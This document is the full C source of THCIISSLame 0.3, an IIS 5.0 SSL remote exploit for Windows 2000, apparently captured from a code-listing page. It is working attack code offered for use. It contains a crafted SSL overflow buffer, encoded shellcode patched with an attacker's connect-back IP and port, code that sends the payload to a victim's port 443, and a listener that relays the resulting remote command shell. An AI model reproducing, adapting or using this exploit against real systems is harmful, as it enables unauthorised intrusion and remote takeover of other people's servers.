123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238239240241242243244245246247248249250251252253 |
- /*****************************************************************************/
- /* THCIISSLame 0.3 - IIS 5 SSL remote root exploit */
- /* Exploit by: Johnny Cyberpunk (jcyberpunk@thc.org) */
- /* THC PUBLIC SOURCE MATERIALS */
- /* */
- /* Bug was found by Internet Security Systems */
- /* Reversing credits of the bug go to Halvar Flake */
- /* */
- /* compile with MS Visual C++ : cl THCIISSLame.c */
- /* */
- /* v0.3 - removed sleep[500]; and fixed the problem with zero ips/ports */
- /* v0.2 - This little update uses a connectback shell ! */
- /* v0.1 - First release with portbinding shell on 31337 */
- /* */
- /* At least some greetz fly to : THC, Halvar Flake, FX, gera, MaXX, dvorak, */
- /* scut, stealth, FtR and Random */
- /*****************************************************************************/
- #include <stdio.h>
- #include <stdlib.h>
- #include <string.h>
- #include <winsock2.h>
- #pragma comment(lib, "ws2_32.lib")
- #define jumper "\xeb\x0f"
- #define greetings_to_microsoft "\x54\x48\x43\x4f\x57\x4e\x5a\x49\x49\x53\x21"
- char sslshit[] = "\x80\x62\x01\x02\xbd\x00\x01\x00\x01\x00\x16\x8f\x82\x01\x00\x00\x00";
- char shellcode[] =
- "\xeb\x25\xe9\xfa\x99\xd3\x77\xf6\x02\x06\x6c\x59\x6c\x59\xf8"
- "\x1d\x9c\xde\x8c\xd1\x4c\x70\xd4\x03\x58\x46\x57\x53\x32\x5f"
- "\x33\x32\x2e\x44\x4c\x4c\x01\xeb\x05\xe8\xf9\xff\xff\xff\x5d"
- "\x83\xed\x2c\x6a\x30\x59\x64\x8b\x01\x8b\x40\x0c\x8b\x70\x1c"
- "\xad\x8b\x78\x08\x8d\x5f\x3c\x8b\x1b\x01\xfb\x8b\x5b\x78\x01"
- "\xfb\x8b\x4b\x1c\x01\xf9\x8b\x53\x24\x01\xfa\x53\x51\x52\x8b"
- "\x5b\x20\x01\xfb\x31\xc9\x41\x31\xc0\x99\x8b\x34\x8b\x01\xfe"
- "\xac\x31\xc2\xd1\xe2\x84\xc0\x75\xf7\x0f\xb6\x45\x09\x8d\x44"
- "\x45\x08\x66\x39\x10\x75\xe1\x66\x31\x10\x5a\x58\x5e\x56\x50"
- "\x52\x2b\x4e\x10\x41\x0f\xb7\x0c\x4a\x8b\x04\x88\x01\xf8\x0f"
- "\xb6\x4d\x09\x89\x44\x8d\xd8\xfe\x4d\x09\x75\xbe\xfe\x4d\x08"
- "\x74\x17\xfe\x4d\x24\x8d\x5d\x1a\x53\xff\xd0\x89\xc7\x6a\x02"
- "\x58\x88\x45\x09\x80\x45\x79\x0c\xeb\x82\x50\x8b\x45\x04\x35"
- "\x93\x93\x93\x93\x89\x45\x04\x66\x8b\x45\x02\x66\x35\x93\x93"
- "\x66\x89\x45\x02\x58\x89\xce\x31\xdb\x53\x53\x53\x53\x56\x46"
- "\x56\xff\xd0\x89\xc7\x55\x58\x66\x89\x30\x6a\x10\x55\x57\xff"
- "\x55\xe0\x8d\x45\x88\x50\xff\x55\xe8\x55\x55\xff\x55\xec\x8d"
- "\x44\x05\x0c\x94\x53\x68\x2e\x65\x78\x65\x68\x5c\x63\x6d\x64"
- "\x94\x31\xd2\x8d\x45\xcc\x94\x57\x57\x57\x53\x53\xfe\xca\x01"
- "\xf2\x52\x94\x8d\x45\x78\x50\x8d\x45\x88\x50\xb1\x08\x53\x53"
- "\x6a\x10\xfe\xce\x52\x53\x53\x53\x55\xff\x55\xf0\x6a\xff\xff"
- "\x55\xe4";
- void usage();
- void shell(int sock);
- int main(int argc, char *argv[])
- {
- unsigned int i,sock,sock2,sock3,addr,rc,len=16;
- unsigned char *badbuf,*p;
- unsigned long offset = 0x6741a1cd;
- unsigned long XOR = 0xffffffff;
- unsigned long XORIP = 0x93939393;
- unsigned short XORPORT = 0x9393;
- unsigned short cbport;
- unsigned long cbip;
- struct sockaddr_in mytcp;
- struct hostent * hp;
- WSADATA wsaData;
- printf("\nTHCIISSLame v0.3 - IIS 5.0 SSL remote root exploit\n");
- printf("tested on Windows 2000 Server german/english SP4\n");
- printf("by Johnny Cyberpunk (jcyberpunk@thc.org)\n");
- if(argc<4 || argc>4)
- usage();
- badbuf = malloc(352);
- memset(badbuf,0,352);
- printf("\n[*] building buffer\n");
- p = badbuf;
- memcpy(p,sslshit,sizeof(sslshit));
- p+=sizeof(sslshit)-1;
-
- strcat(p,jumper);
- strcat(p,greetings_to_microsoft);
- offset^=XOR;
- strncat(p,(unsigned char *)&offset,4);
- cbport = htons((unsigned short)atoi(argv[3]));
- cbip = inet_addr(argv[2]);
- cbport ^= XORPORT;
- cbip ^= XORIP;
- memcpy(&shellcode[2],&cbport,2);
- memcpy(&shellcode[4],&cbip,4);
- strcat(p,shellcode);
-
- if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0)
- {
- printf("WSAStartup failed !\n");
- exit(-1);
- }
-
- hp = gethostbyname(argv[1]);
- if (!hp){
- addr = inet_addr(argv[1]);
- }
- if ((!hp) && (addr == INADDR_NONE) )
- {
- printf("Unable to resolve %s\n",argv[1]);
- exit(-1);
- }
- sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
- if (!sock)
- {
- printf("socket() error...\n");
- exit(-1);
- }
-
- if (hp != NULL)
- memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
- else
- mytcp.sin_addr.s_addr = addr;
- if (hp)
- mytcp.sin_family = hp->h_addrtype;
- else
- mytcp.sin_family = AF_INET;
- mytcp.sin_port=htons(443);
- printf("[*] connecting the target\n");
- rc=connect(sock, (struct sockaddr *) &mytcp, sizeof (struct sockaddr_in));
- if(rc==0)
- {
- send(sock,badbuf,351,0);
- printf("[*] exploit send\n");
-
- mytcp.sin_addr.s_addr = 0;
- mytcp.sin_port=htons((unsigned short)atoi(argv[3]));
- sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
-
- rc=bind(sock2,(struct sockaddr *)&mytcp,16);
- if(rc!=0)
- {
- printf("bind error() %d\n",WSAGetLastError());
- exit(-1);
- }
-
- rc=listen(sock2,1);
- if(rc!=0)
- {
- printf("listen error()\n");
- exit(-1);
- }
- printf("[*] waiting for shell\n");
- sock3 = accept(sock2, (struct sockaddr*)&mytcp,&len);
- if(sock3)
- {
- printf("[*] Exploit successful ! Have fun !\n");
- printf("[*] --------------------------------------------------------------------\n\n");
- shell(sock3);
- }
- }
- else
- {
- printf("\nCan't connect to ssl port 443!\n");
- exit(-1);
- }
-
- shutdown(sock,1);
- closesocket(sock);
- shutdown(sock,2);
- closesocket(sock2);
- shutdown(sock,3);
- closesocket(sock3);
- free(badbuf);
- exit(0);
- }
-
- void usage()
- {
- unsigned int a;
- printf("\nUsage: <victim-host> <connectback-ip> <connectback port>\n");
- printf("Sample: THCIISSLame www.lameiss.com 31.33.7.23 31337\n\n");
- exit(0);
- }
- void shell(int sock)
- {
- int l;
- char buf[1024];
- struct timeval time;
- unsigned long ul[2];
- time.tv_sec = 1;
- time.tv_usec = 0;
- while (1)
- {
- ul[0] = 1;
- ul[1] = sock;
- l = select (0, (fd_set *)&ul, NULL, NULL, &time);
- if(l == 1)
- {
- l = recv (sock, buf, sizeof (buf), 0);
- if (l <= 0)
- {
- printf ("bye bye...\n");
- return;
- }
- l = write (1, buf, l);
- if (l <= 0)
- {
- printf ("bye bye...\n");
- return;
- }
- }
- else
- {
- l = read (0, buf, sizeof (buf));
- if (l <= 0)
- {
- printf("bye bye...\n");
- return;
- }
- l = send(sock, buf, l, 0);
- if (l <= 0)
- {
- printf("bye bye...\n");
- return;
- }
- }
- }
- }
|